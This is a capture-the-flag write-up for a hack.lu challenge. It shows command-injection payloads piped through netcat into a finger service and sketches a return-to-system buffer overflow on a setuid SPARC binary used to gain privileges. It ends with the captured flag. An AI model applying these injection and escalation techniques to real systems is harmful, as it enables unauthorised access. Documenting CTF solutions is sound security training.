Your command is to get as much information about the crew of an antique space shuttle. We know our acient father used finger as reference point at
nc ctf.hack.lu 2003
Summary: bash injection, and buffer overflow on a suid binary to get more privilegies
After playing around with netcat, we see that sending random words closes the connection, and whitespace or ‘;’ gives output:
$ echo | nc ctf.hack.lu 2003 Login Name Tty Idle Login Time Office Office Phone user pts/0 9:02 Tue 23:36 user pts/1 10:42 Tue 13:38 user pts/10 1:29 Wed 07:54 ...
According to the task description, we can determine that it’s finger. Looks like it’s shell command injection. finger accepts username, let’s try user:
echo user | nc ctf.hack.lu 2003 Login: nobody Name: Unprivileged user Directory: /nonexistent Shell: /sbin/nologin Never logged in. No Mail. No Plan. Login: user Name: Directory: /home/user Shell: /usr/pkg/bin/bash On since Tue Sep 20 23:36 (CEST) on pts/0, idle 9:04, from 188.8.131.52 ...
Yeah. But why another words don’t produce any output? Maybe stderr is not sent?
$ echo 'test 2>&1' | nc ctf.hack.lu 2003 finger: test: no such user
Right! Let’s try inject:
$ echo '$(ls -al) 2>&1' | nc ctf.hack.lu 2003 finger: total: no such user finger: 28: no such user finger: drwxr-xr-x: no such user ...
Oh, it splits on spaces! Also there’s no base64 there. Luckily, tr was present:
$ echo '$(ls -al | tr " " ".") 2>&1' | nc ctf.hack.lu 2003 finger: total.28: no such user finger: drwxr-xr-x..2.root..users.....512.Sep.19.19:28..: no such user finger: drwxr-xr-x..4.root..wheel.....512.Sep..8.21:15...: no such user finger: lrwxr-xr-x..1.root..users.......9.Sep..8.22:20..bash_history.->./dev/null: no such user finger: -r-xr-sr-x..1.root..leaders..4796.Sep..8.22:57.auth: no such user finger: -rwxr-xr-x..1.root..users.....961.Sep.20.10:51.finger.py: no such user finger: -rw-r--r--..1.root..users.....139.Sep.20.14:09.info: no such user $ echo '$(cat info | tr " " ".") 2>&1' | nc ctf.hack.lu 2003 finger: Ok.so.you.got.access,.now.try.to.get.more.privileges.by.exploiting: no such user finger: the.auth.protocol..you.can.login.to.ssh.at.port.2004: no such user finger: with.user:user4422: no such user
Wait.. Where’s the flag??? GIMME MY FLAG!!!1
No, we have to ssh there and exploit a binary. Also, it’s a SPARC arch, so it’ll be a great fun.
If you want to have a look at the binary, here it is.
Shortly, you pass two arguments to a program: text and a number. If number is greater than 8, program exits, else does a strcpy of our text. Using -1 makes buffer overflow possible.
Stack is not executable, but ASLR is not present. So we can use libc functions directly. system & symlink technique works here.
Buffer must be composed in a way to overwrite some return address with &system-8 and other dwords should be valid frame pointers. Than we look name of the command passed to system in gdb, and create a symlink to /usr/pkg/bin/bash. Don’t forget to add current directory to PATH.
The flag: a3YCcRtDqLMp0OK2
PS. You can try finger.py if you want.